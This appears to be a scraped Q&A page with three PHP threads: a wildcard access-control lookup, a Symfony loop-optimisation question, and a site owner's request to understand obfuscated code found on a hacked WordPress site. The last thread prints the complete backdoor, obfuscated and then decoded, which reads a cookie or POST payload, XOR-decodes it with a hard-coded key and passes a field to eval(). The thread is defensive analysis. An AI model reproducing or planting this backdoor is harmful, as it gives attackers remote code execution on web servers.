Access Control Problem - php

I am developing an access control library for my project and I am looking for the best solution to do this:
I am getting my whole access list from the database into an array. As a result it looks like this:
$array = array(
'*' => array('administrator' => TRUE),
'frontend/*' => array(
'user' => TRUE,
'unregistered' => TRUE
),
'backend/*' => array(
'user' => FALSE,
'unregistered' => FALSE
),
'backend/user/*' => array(
'moderator' => FALSE,
'supermoderator' => TRUE,
),
'backend/article/*' => array(
'supermoderator' => TRUE
),
'backend/article/add/new' => array(
'moderator' => TRUE
)
);
The " * " means this user has access to all of the related options; backend/article/* means that group has access to all article options (article/add, article/remove, ...).
As you see, there is no item in backend/article/add for supermoderator, but it has the master access to all article pages.
What is the best way to check this? I tried array_walk() but I guess it won't help me.
Thank you for any advice...
I can share my whole code if you want.
* Edit *
Am I storing it wrong? If you have a better solution to store it I will be happy to hear it.
Thank you for any advice

No matter what, this is going to be a complex algorithm; a simple array_walk won't do. Unless someone is feeling particularly generous and will write one for you, I suggest you hire a programmer.
Am I storing it wrong? If you have a better solution to store it I will be happy to hear it.
It totally depends on your algorithm. You can probably write one that uses your current data format. You can also probably write a simpler one if you change your data format. But what your data format should look like then, well, that's a job for a programmer.

I found the answer myself:
Let's say the user is trying to access backend/article/add/new and this user is in the supermoderator group. So I need to look for backend/*, backend/article/*, backend/article/add/*. array_slice() and for() are enough for this:
I am using CodeIgniter, by the way. I modified it a little bit to separate frontend and backend controllers. I am not using the application/controller directory. I am using the application/backend and application/frontend directories for controllers.
So a URI pattern is this: http://site.com/[backend]*/[directory]*/class/method
// This is the page that the user is trying to reach
$requested_page = "backend/article/add/new";
// parsing...
$x = explode('/', $requested_page);
// this is needed to cut the last 3, 2, 1 items of $x
// (a negative length of -count($x) would give an empty slice, i.e. "/*")
$i = count($x) > 3 ? -3 : 1 - count($x);
for (; $i < 0; $i++) {
    $resource = implode('/', array_slice($x, 0, $i)) . '/*';
    // echoing for debug
    echo $resource . "\n";
}
// Outputs:
// backend/*
// backend/article/*
// backend/article/add/*

function userHasPermissions($permissionsArray, $user, $path) {
    // Check exact
    if (isset($permissionsArray[$path]) &&
        isset($permissionsArray[$path][$user])) {
        return $permissionsArray[$path][$user];
    }
    // Check lower and lower
    $partArr = explode('/', $path);
    for ($i = substr_count($path, '/'); $i >= 0; $i--) {
        if ($i > 0) {
            $choppedPartArr = array_slice($partArr, 0, $i);
            // separator first: the reversed argument order was removed in PHP 8
            $newPath = implode('/', $choppedPartArr) . '/*';
        } else {
            $newPath = '*';
        }
        if (isset($permissionsArray[$newPath]) &&
            isset($permissionsArray[$newPath][$user])) {
            return $permissionsArray[$newPath][$user];
        }
    }
    // No rule matched: deny
    return false;
}
echo "Result: " . (userHasPermissions($array, 'supermoderator', 'backend/article/add') ? "true" : "false");
Note that 'backend/article' will return false for 'supermoderator' since 'backend/article/*' does not match it. To change this, simply change $i = substr_count($path, '/'); to $i = substr_count($path, '/')+1;.
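As an added example (not code from the thread), here is the same most-specific-match lookup extended beyond the single-group case: the request path is normalised before the lookup, only a literal TRUE grants access, the deciding rule is returned so it can be logged, and a user may hold several groups. The names normalisePath, candidateKeys and checkAccess, the deny-wins tie-break and the sample requests are assumptions made for this example.

```php
<?php
// Added example, not code from the thread. Policy choices are assumptions (see lead-in).

// Access list exactly as posted in the question.
$acl = array(
    '*'                       => array('administrator' => TRUE),
    'frontend/*'              => array('user' => TRUE, 'unregistered' => TRUE),
    'backend/*'               => array('user' => FALSE, 'unregistered' => FALSE),
    'backend/user/*'          => array('moderator' => FALSE, 'supermoderator' => TRUE),
    'backend/article/*'       => array('supermoderator' => TRUE),
    'backend/article/add/new' => array('moderator' => TRUE),
);

/** Canonicalise the requested path; null means "reject without consulting the ACL". */
function normalisePath(string $raw): ?string
{
    $parts = array();
    foreach (explode('/', $raw) as $seg) {
        if ($seg === '') {
            continue;       // collapse leading, trailing and doubled slashes
        }
        if ($seg === '.' || $seg === '..' || strpos($seg, '*') !== false) {
            return null;    // dot-segments and literal wildcards are never valid requests
        }
        $parts[] = $seg;
    }
    return $parts ? implode('/', $parts) : null;
}

/** Keys to try, most specific first: exact path, then a/b/*, a/*, and finally *. */
function candidateKeys(string $path): array
{
    $parts = explode('/', $path);
    $keys  = array($path);
    for ($i = count($parts) - 1; $i >= 1; $i--) {
        $keys[] = implode('/', array_slice($parts, 0, $i)) . '/*';
    }
    $keys[] = '*';
    return $keys;
}

/**
 * Returns array('allowed' => bool, 'rule' => string|null).
 * The first (most specific) key that mentions any of the user's groups decides;
 * if that key both allows and denies, deny wins; no matching rule means deny.
 */
function checkAccess(array $acl, array $groups, string $rawPath): array
{
    $path = normalisePath($rawPath);
    if ($path === null) {
        return array('allowed' => false, 'rule' => null);
    }
    foreach (candidateKeys($path) as $key) {
        if (!isset($acl[$key])) {
            continue;
        }
        $hits = array_intersect_key($acl[$key], array_flip($groups));
        if ($hits) {
            $allowed = true;
            foreach ($hits as $value) {
                if ($value !== true) {      // strict: 1, "yes" or "true" do not grant
                    $allowed = false;
                }
            }
            return array('allowed' => $allowed, 'rule' => $key);
        }
    }
    return array('allowed' => false, 'rule' => null);
}

// Constructed requests covering the cases discussed in the thread.
$requests = array(
    array(array('supermoderator'), 'backend/article/add/new'),
    array(array('moderator'), 'backend/article/add/new'),
    array(array('moderator'), 'backend/user/edit'),
    array(array('moderator', 'supermoderator'), 'backend/user/edit'),
    array(array('administrator'), 'backend/user/edit'),
    array(array('user'), '/frontend//news/'),
    array(array('unregistered'), 'frontend/../backend/article/add'),
    array(array('guest'), 'frontend/news'),
);
foreach ($requests as $r) {
    $res = checkAccess($acl, $r[0], $r[1]);
    printf("%-26s %-32s %-5s %s\n", implode('+', $r[0]), $r[1],
        $res['allowed'] ? 'ALLOW' : 'DENY', $res['rule'] ?? '(no rule)');
}
```

Logging the returned rule alongside the decision makes it possible to audit which wildcard entry granted a given request.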

Related

code needs to loop over minimum 2000 times in php foreach

I am having the foreach loop that will run minimum 2000 loops
foreach ($giftCardSchemeData as $keypreload => $preload) {
for ($i=0; $i <$preload['quantity'] ; $i++) {
$cardid = new CarddetailsId($uuidGenerator->generate());
$cardnumber = self::getCardNumber();
$cardexistencetype = ($key == "giftCardSchemeData") ? "Physical" : "E-Card" ;
$giftCardSchemeDataDb = array('preload' => array('value' => $preload['value'], 'expirymonths' => $preload['expiryMonths']));
$otherdata = array('cardnumber' => $cardnumber, 'cardexistencetype' => $cardexistencetype, 'isgiftcard' => true , 'giftcardamount' => $preload['value'],'giftCardSchemeData' => json_encode($giftCardSchemeDataDb), 'expirymonths' => $preload['expiryMonths'], 'isloyaltycard' => false, 'loyaltypoints' => null,'loyaltyCardSchemeData' => null, 'loyaltyRedeemAmount' => null, 'pinnumber' => mt_rand(100000,999999));
$output = array_merge($data, $otherdata);
// var_dump($output);
$carddetailsRepository = $this->get('oloy.carddetails.repository');
$carddetails = $carddetailsRepository->findByCardnumber($cardnumber);
if (!$carddetails) {
$commandBus->dispatch(
new CreateCarddetails($cardid, $output)
);
} else {
self::generateCardFunctionForErrorException($cardid, $output, $commandBus);
}
}
}
Like the foreach above, I have 5 of them in total. Each time I call the function, the 5 foreach loops run and then the response is returned. It takes more time and the PHP maximum execution time error occurs.
Is there any way to send the response and then run the foreach on the server side, without hitting the maximum execution time issue? I also need an optimization for the foreach.
Also, in Symfony I have tried the try/catch method for the existence check in the above code; it returns the Entity closed error. I have temporarily used the existence check in the DB, but it needs an optimization.
There seems to be a lot wrong (or to be optimized) with this code, but let's focus on your questions:
First I think this code shouldn't be in code that will be triggered by a visitor.
You should separate 2 processes:
1. A cronjob that generates everything that must be generated and saves that generated info to a database. The cronjob can take as much time as it needs. Look at Symfony's console components
2. A page that displays only the generated info by fetching it from the database and passing it to a Twig template.
However, looking at the code you posted I think it can be greatly optimized as is. You seem to have a foreach loop that fetches variable data, and in that you have a for-loop that does not seem to generate much variability at all.
So most of the code inside the for loop is now being executed over and over again without making any actual changes.
Here is a concept that would give much higher performance. Of course, since I don't know the actual context of your code, you will have to "fix it".
$carddetailsRepository = $this->get('oloy.carddetails.repository');
$cardexistencetype = ($key == "giftCardSchemeData") ? "Physical" : "E-Card";
foreach ($giftCardSchemeData as $keypreload => $preload) {
$cardnumber = self::getCardNumber();
$carddetails = $carddetailsRepository->findByCardnumber($cardnumber);
$giftCardSchemeDataDb = array('preload' => array('value' =>
$preload['value'], 'expirymonths' => $preload['expiryMonths']));
$otherdata = array('cardnumber' => $cardnumber, 'cardexistencetype' =>
$cardexistencetype, 'isgiftcard' => true , 'giftcardamount' =>
$preload['value'],'giftCardSchemeData' =>
json_encode($giftCardSchemeDataDb), 'expirymonths' =>
$preload['expiryMonths'], 'isloyaltycard' => false, 'loyaltypoints' =>
null,'loyaltyCardSchemeData' => null, 'loyaltyRedeemAmount' => null,
'pinnumber' => 0);
$output = array_merge($data, $otherdata);
for ($i=0; $i <$preload['quantity'] ; $i++) {
$cardid = new CarddetailsId($uuidGenerator->generate());
$output['pinnumber'] = mt_rand(100000,999999);
if (!$carddetails) {
$commandBus->dispatch(
new CreateCarddetails($cardid, $output)
);
} else {
self::generateCardFunctionForErrorException($cardid, $output, $commandBus);
}
}
}
Also: if in this code you are triggering any database inserts or updates, you don't want to trigger them each iteration. You will want to start some kind of database transaction and flush the queries each X iterations instead.

Obfuscating script in WordPress [closed]

One of my clients using WordPress got hacked with some malicious code like the one below. There are lots of files like this all over her public_html. Though I told her to delete everything, re-upload it all and update the framework, plugins, etc., I also want to know how I can de-obfuscate the code.
Why? Because my VPS provider told me that some hacking attempt was made using my IP (main server) against some news channel and I should stop this kind of activity or they will simply discontinue my VPS.
So could anyone guide me to the exact code so I can analyze what kind of harm it may have done?
Please note I've set up jail-shell, CSF and IP blocking; it still finds some way.
<?php
$GLOBALS['efaa04'] = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b";
$GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][12]] = $GLOBALS['efaa04'][45].$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][93];
$GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]] = $GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][40];
$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][14];
$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]] = $GLOBALS['efaa04'][43].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][86];
$GLOBALS[$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][67]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][77].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][60]] = $GLOBALS['efaa04'][94].$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][94].$GLOBALS['efaa04'][25].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][14];
$GLOBALS[$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][96]] = $GLOBALS['efaa04'][71].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][77].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][22].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][40]] = $GLOBALS['efaa04'][52].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][86];
$GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60]] = $GLOBALS['efaa04'][21].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][59];
$GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]] = $GLOBALS['efaa04'][14].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59];
$GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][33]] = $_POST;
$GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][33]] = $_COOKIE;
#$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][4], NULL);
#$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][10].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][4].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][29], 0);
#$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][91].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][35], 0);
#$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35]](0);
$n1f035 = NULL;
$la02268b = NULL;
$GLOBALS[$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][59]] = $GLOBALS['efaa04'][78].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][33];
global $ea0d31;
function n6ee1($n1f035, $f3ddc0)
{
$kdaf = "";
for ($v40207=0; $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($n1f035);)
{
for ($w6efcf7b=0; $w6efcf7b<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($f3ddc0) && $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($n1f035); $w6efcf7b++, $v40207++)
{
$kdaf .= $GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][12]]($GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]]($n1f035[$v40207]) ^ $GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]]($f3ddc0[$w6efcf7b]));
}
}
return $kdaf;
}
function q471($n1f035, $f3ddc0)
{
global $ea0d31;
return $GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]]($GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]]($n1f035, $ea0d31), $f3ddc0);
}
foreach ($GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][33]] as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
if (!$n1f035)
{
foreach ($GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][33]] as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
}
$n1f035 = #$GLOBALS[$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][96]]($GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60]]($GLOBALS[$GLOBALS['efaa04'][22].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][40]]($n1f035), $la02268b));
if (isset($n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]]) && $ea0d31==$n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]])
{
if ($n1f035[$GLOBALS['efaa04'][12]] == $GLOBALS['efaa04'][43])
{
$v40207 = Array(
$GLOBALS['efaa04'][94].$GLOBALS['efaa04'][25] => #$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][60]](),
$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][25] => $GLOBALS['efaa04'][59].$GLOBALS['efaa04'][51].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][59],
);
echo #$GLOBALS[$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][67]]($v40207);
}
elseif ($n1f035[$GLOBALS['efaa04'][12]] == $GLOBALS['efaa04'][35])
{
eval($n1f035[$GLOBALS['efaa04'][40]]);
}
exit();
}
Tried to decode it with http://localhost/script.php?testGet=sss and got result
Array
(
[_GET] => Array
(
[testGet] => sss
)
[_POST] => Array
(
)
[_COOKIE] => Array
(
)
[_FILES] => Array
(
)
[GLOBALS] => Array
*RECURSION*
[efaa04] => > ,Fg7R2}Sl{a)nhO?#P=qjT0vY%+s-(|f#e]XZ"d3Wi[c&KQxN.b5~\BEG16*:Jow_9!
/uAyMU^z4DH
< I`t$LC'mVrpk8;
[m56df3a] => chr
[ue8410] => ord
[x6a870c8] => strlen
[rfa65] => ini_set
[ne6255ab9] => serialize
[y648d6] => phpversion
[h8f865758] => unserialize
[j51e1d] => base64_decode
[y8512e] => set_time_limit
[t4193646] => q471
[t297c] => n6ee1
[uaf6e192f] => Array
(
)
[mb1694f] => Array
(
)
[n1f035] =>
[la02268b] =>
[ea0d31] => 435a677a-8b6e-4dc3-92e9-b2746832025f
)
got here
got not set n1f035
got q471string(0) ""
got n6ee1 : => 435a677a-8b6e-4dc3-92e9-b2746832025f
strlen
NULL string(0) ""
got n6ee1 : =>
strlen
NULL string(0) "" string(0) ""
got n6ee1 : => 435a677a-8b6e-4dc3-92e9-b2746832025f
strlen
NULL string(0) ""
got n6ee1 : =>
strlen
NULL bool(false)
I've told my client to delete all files and re-upload from the backup. As I said, I've found so many C99madshell (raw) files; is this the same kind, in an obfuscated manner?
Please note I've found a way to protect the site by searching for malicious code and deleting it. Then I ran a command like chattr -R +i ./public_html and it seems to have stopped, though I'm sure there are many backdoor scripts still inside. But it would be better if I knew the exact code of the above.
I agree with @Epodax, SO is not a security consultancy site, but I think the discussion around de-obfuscation is worthy and many people could learn a lot from it.
I still couldn't figure out what the script does, slowly working on it as I find spare time, but want to share my progress so far anyways.
First I used Psysh, an interactive PHP shell, to retrieve all those concatenations of $GLOBALS['efaa04'] elements and make life easier. Just run the first line $GLOBALS['efaa04'] = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b"; and then go echoing the parts that use this array elements to figure out what they mean.
Some lines like this revealed:
$GLOBALS["x6a870c8"] = "strlen";
$GLOBALS["rfa65"] = "ini_set";
$GLOBALS["ne6255ab9"] = "serialize";
$GLOBALS["y648d6"] = "phpversion";
$GLOBALS["h8f865758"] = "unserialize";
...
After that I replaced $GLOBALS["x6a870c8"] with strlen, $GLOBALS["rfa65"] with ini_set and so on, and this is what I got so far:
<?php
// Error logging is silenced and execution limits are lifted
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$n1f035 = NULL;
$la02268b = NULL;
// Hard-coded key, used both for the XOR step and as the "ak" check below
$GLOBALS["ea0d31"] = "435a677a-8b6e-4dc3-92e9-b2746832025f";
global $ea0d31;
// Repeating-key XOR of $n1f035 with $f3ddc0
function n6ee1($n1f035, $f3ddc0)
{
    $kdaf = "";
    for ($v40207=0; $v40207 < strlen($n1f035);)
    {
        for ($w6efcf7b=0; $w6efcf7b < strlen($f3ddc0) && $v40207 < strlen($n1f035); $w6efcf7b++, $v40207++)
        {
            $kdaf .= chr(ord($n1f035[$v40207]) ^ ord($f3ddc0[$w6efcf7b]));
        }
    }
    return $kdaf;
}
// XOR with the hard-coded key, then with the second key
function q471($n1f035, $f3ddc0)
{
    global $ea0d31;
    return n6ee1(n6ee1($n1f035, $ea0d31), $f3ddc0);
}
// The last cookie (value and name) is taken as payload and second key
foreach ($_COOKIE as $f3ddc0=>$tf250bbad)
{
    $n1f035 = $tf250bbad;
    $la02268b = $f3ddc0;
}
// With no cookie, the last POST field is used instead
if (!$n1f035)
{
    foreach ($_POST as $f3ddc0=>$tf250bbad)
    {
        $n1f035 = $tf250bbad;
        $la02268b = $f3ddc0;
    }
}
// Payload: base64 -> double XOR -> unserialize
$n1f035 = @unserialize(q471(base64_decode($n1f035), $la02268b));
if (isset($n1f035["ak"]) && $ea0d31==$n1f035["ak"])
{
    if ($n1f035["a"] == "i")
    {
        // "i": report the PHP version and the script version
        $v40207 = Array(
            "pv" => @phpversion(),
            "sv" => "1.0-1",
        );
        echo @serialize($v40207);
    }
    elseif ($n1f035["a"] == "e")
    {
        // "e": the "d" field of the request is passed to eval()
        eval($n1f035["d"]);
    }
    exit();
}
